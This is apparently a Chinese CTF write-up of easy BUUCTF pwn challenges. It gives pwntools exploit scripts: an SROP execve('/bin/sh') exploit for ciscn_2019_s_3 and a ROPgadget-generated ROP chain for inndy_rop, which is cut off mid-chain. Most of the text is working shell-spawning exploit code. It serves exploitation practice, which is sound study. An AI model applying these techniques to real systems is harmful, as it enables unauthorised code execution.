BUUCTF pwn水题大赏
ciscn_2019_s_3
srop
,要注意 rsp
指向的位置。
exp:
from pwn import*
context.log_level = 'DEBUG'
context.arch = 'amd64'
p = remote('node3.buuoj.cn',29369)
#p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')
syscall_ret = 0x400517
start_addr = 0x04004ED
sigret = 0x4004DA
payload1 = '/bin/sh\x00'*2+p64(start_addr)
p.send(payload1)
sleep(0.1)
p.recv(0x20)
binsh = u64(p.recv(8))-0x118
print hex(binsh)
###gdb.attach(p)
exe = SigreturnFrame()
exe.rax = constants.SYS_execve
exe.rdi = binsh
exe.rsi = 0
exe.rdx = 0
exe.rip = syscall_ret
payload2='/bin/sh\x00'*2+p64(sigret)+p64(syscall_ret)+str(exe)
p.sendline(payload2)
p.interactive()
inndy_rop
很奇怪的一道题,简单的栈溢出,但是 rop
不需要自己写。
ROPgadget
有一个功能,可以直接构造 rop
链。
ROPgadget --binary rop --ropchain
exp:
from pwn import*
from struct import pack
context.log_level = 'DEBUG'
i=remote('node3.buuoj.cn',29638)
#i=process('./rop')
elf=ELF('./rop')
p = 'a'*16
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack(